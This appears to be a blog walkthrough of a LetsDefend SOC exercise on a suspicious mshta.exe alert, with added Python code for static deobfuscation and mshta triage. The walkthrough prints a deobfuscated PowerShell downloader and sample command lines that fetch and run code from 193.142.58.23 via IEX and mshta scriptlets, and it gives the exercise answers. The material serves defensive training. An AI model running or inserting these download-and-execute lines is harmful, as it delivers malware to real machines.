SOC164 Suspicious Mshta Behavior | LetsDefend Cyber Exercise
Today we are going to investigate a LetsDefend alert and try to respond to it in the correct format.
Level: Security Operations
Type: LOLBin
EventID: 114
Tools: AbuseIP, VirusTotal.
What are Living-off-the-land binaries (LOLBins)?
A LOLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.
(definition: talosintelligence.com)
VirusTotal
I searched VirusTotal using the MD5 hash given by LetsDefend and got this.
Determine Suspicious Activity
On this site you can look up a LOLBin and get information about how it can be abused.
https://lolbas-project.github.io/lolbas/Binaries/Mshta/#execute
To answer this, go to Endpoint Security and filter by the IP address, in this case 172.16.17.38, which is Roberto's computer. Then look for the process that calls mshta.exe and get the content of its command line. In my case I found this content:
This script is a PowerShell downloader (typical of malware) obfuscated with hexadecimal. It does the following:
It defines a function HI($i) that converts hexadecimal text to ASCII (for example, “446F776E” → “Down”).
It creates a Net.WebClient object.
It dynamically constructs the name of the DownloadString method using hexadecimal:
446F776E → Down
6C6F → lo
616473747269 → adstri
6E67 → ng
=> Down + lo + adstri + ng = Downloadstring, which PowerShell resolves to the DownloadString method because member names are case-insensitive.
It then executes the result:
It downloads http://193.142.58.23/Server.txt
Then it runs the returned text in memory using IEX (Invoke-Expression), so the second stage never has to be written to disk.
"Unobfuscated" version (what it actually does)
function HI($i){
    # Decode a hex string two characters at a time into ASCII text.
    $r = ''
    for($n = 0; $n -lt $i.Length; $n += 2){
        $r += [char][int]("0x" + $i.Substring($n, 2))
    }
    return $r
}
# Fetch the second stage and run it in memory; this is the malicious part.
$wc = New-Object Net.WebClient
$code = $wc.DownloadString("http://193.142.58.23/Server.txt")
IEX $code
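The safe way to confirm what the obfuscated command line does is to decode it statically rather than run it. The following is an added example (not code from the page or from the LetsDefend challenge) written in Python so it can run on an analyst workstation without executing any PowerShell. It ports the HI() decoder, replaces every (HI 'hex') call with its plaintext, folds the string concatenation, and pulls out the URL, host and dangerous member names. SAMPLE_CMDLINE is a constructed command line that mirrors the structure described above; the real alert's command line is not reproduced on the page, so treat it as an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed sample command line (an assumption, not the alert's real text).
# It mirrors the structure the page describes: an HI() hex decoder, the method
# name assembled from hex chunks, and IEX of the downloaded text.
SAMPLE_CMDLINE = (
    "powershell -w hidden -c \"function HI($i){$r='';"
    "for($n=0;$n -lt $i.Length;$n+=2){$r+=[char][int]('0x'+$i.Substring($n,2))};"
    "return $r};$wc=New-Object Net.WebClient;"
    "$m=(HI '446F776E')+(HI '6C6F')+(HI '616473747269')+(HI '6E67');"
    "IEX $wc.$m('http://193.142.58.23/Server.txt')\""
)

# Calls of the form (HI 'hex'), quoted-string concatenations, and URLs.
HI_CALL = re.compile(r"\(HI\s+'([0-9A-Fa-f]+)'\)")
CONCAT = re.compile(r"'([^']*)'\+'([^']*)'")
URL = re.compile(r"https?://[^\s'\"()]+")

# Member names and cmdlets worth flagging once the command line is readable.
SUSPICIOUS_TOKENS = ("DownloadString", "DownloadFile", "DownloadData",
                     "Net.WebClient", "IEX", "Invoke-Expression")


def hi(hexstr: str) -> str:
    """Python port of the script's HI($i): each pair of hex digits -> one char."""
    out = []
    for n in range(0, len(hexstr) - 1, 2):
        out.append(chr(int(hexstr[n:n + 2], 16)))
    return "".join(out)


def decode_hi_calls(cmdline: str) -> str:
    """Replace every (HI 'hex') call with the string literal it decodes to."""
    return HI_CALL.sub(lambda m: "'" + hi(m.group(1)) + "'", cmdline)


def fold_concats(text: str) -> str:
    """Collapse 'a'+'b'+'c' into 'abc', repeating until nothing changes."""
    prev = None
    while prev != text:
        prev, text = text, CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def analyze(cmdline: str) -> dict:
    """Statically deobfuscate a command line and extract indicators.

    Nothing is executed: only string operations are used, which is how this
    should be done when triaging an alert."""
    decoded = fold_concats(decode_hi_calls(cmdline))
    # PowerShell member names are case-insensitive, so "Downloadstring" (what
    # the page's hex chunks actually spell) still resolves to DownloadString.
    tokens = [t for t in SUSPICIOUS_TOKENS
              if re.search(r"\b" + re.escape(t) + r"\b", decoded, re.IGNORECASE)]
    urls = URL.findall(decoded)
    return {
        "decoded": decoded,
        "tokens": tokens,
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print(result["decoded"])
    print("tokens:", result["tokens"])
    print("urls:", result["urls"], "hosts:", result["hosts"])
```

Running it prints the readable script, the flagged tokens (DownloadString, Net.WebClient, IEX) and the download URL, which are exactly the artifacts you need for the report. Because the regex approach only knows about this script's HI() pattern, a different obfuscator would need its own decoder, but the approach of decoding with string operations instead of running the sample stays the same.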
What Is the Suspicious Activity?
Answer: Execute
As the analysis above shows, the adversary used the TTP called System Binary Proxy Execution: Mshta. For more information, see MITRE ATT&CK and LOLBAS:
Mshta on LOLBAS (https://lolbas-project.github.io/lolbas/Binaries/Mshta/): Mshta.exe is a living-off-the-land file containing unexpected functionality that can be abused by attackers; this page…
System Binary Proxy Execution: Mshta (MITRE ATT&CK ID T1218.005): Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted…
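The endpoint search described earlier (filter by host, find mshta.exe, read the command line) can be turned into a small triage rule. The following is an added example, not code from the page or from LetsDefend, in Python. It runs over constructed process-creation events (the hosts, parent images, paths and file names are assumptions made for the example, not the real telemetry) and reports every event on the chosen host that matches T1218.005 behaviour: mshta.exe given an inline javascript:/vbscript: payload or a remote URL, an .hta launched from a user-writable path, or mshta.exe spawning a script host such as powershell.exe. A locally installed .hta under Program Files is deliberately left unflagged.

```python
import re

# Constructed process-creation events (sample data, not the real telemetry).
EVENTS = [
    {"host": "172.16.17.38", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\wizard.hta"'},          # benign
    {"host": "172.16.17.38", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\Roberto\Downloads\file.hta"'},          # user-writable path
    {"host": "172.16.17.38", "parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"$wc=New-Object Net.WebClient;"
                "IEX $wc.DownloadString('http://193.142.58.23/Server.txt')\""},  # child of mshta
    {"host": "172.16.17.38", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe javascript:a=GetObject(\"script:http://193.142.58.23/x.sct\").Exec();close();"},
    {"host": "172.16.17.40", "parent": "winword.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://193.142.58.23/x.hta"},                       # other host
]

# Script hosts that mshta.exe has no legitimate reason to spawn in most fleets.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# Inline script protocols or a remote location passed straight to mshta.exe.
INLINE_OR_REMOTE = re.compile(r"(javascript:|vbscript:|about:|https?://)", re.IGNORECASE)
# Directories a normal user can write to; installed software lives elsewhere.
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData|Downloads)\\", re.IGNORECASE)

TECHNIQUE = "T1218.005"  # System Binary Proxy Execution: Mshta


def triage(events, host):
    """Return (technique, reason, cmdline) for each suspicious event on `host`."""
    findings = []
    for e in events:
        if e["host"] != host:
            continue
        image, parent, cmd = e["image"].lower(), e["parent"].lower(), e["cmdline"]
        if image == "mshta.exe":
            if INLINE_OR_REMOTE.search(cmd):
                findings.append((TECHNIQUE, "mshta with inline/remote script", cmd))
            elif USER_WRITABLE.search(cmd):
                findings.append((TECHNIQUE, "HTA launched from user-writable path", cmd))
        elif parent == "mshta.exe" and image in SCRIPT_HOSTS:
            findings.append((TECHNIQUE, "mshta spawned " + image, cmd))
    return findings


if __name__ == "__main__":
    for technique, reason, cmd in triage(EVENTS, "172.16.17.38"):
        print(f"[{technique}] {reason}: {cmd}")
```

The command lines the rule returns are the ones to record as artifacts and feed into deobfuscation; the parent/child relationship is what ties the PowerShell downloader back to mshta.exe when the HTA itself is no longer on disk.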
I put Malware.
Correct: Users
Go to Endpoint Security and press Containment.
Containment isolates the endpoint from the network so it can no longer communicate with other hosts (or with the attacker's server).
Add Artifacts
MD5: 6685c433705f558c5535789234db0e5
URL: http://193.142.58.23/Server.txt (IP address 193.142.58.23)
Analyst Note
I made a mistake because I said the activity was performed by the malware, which is wrong, since if you look at the command line, the commands run on cmd are normal. If malware tried to run commands, those commands would be more complex, like the obfuscated command. But my mistake can help you learn about it: if you want to work as a SOC analyst you need strong knowledge about this process and this type of analysis.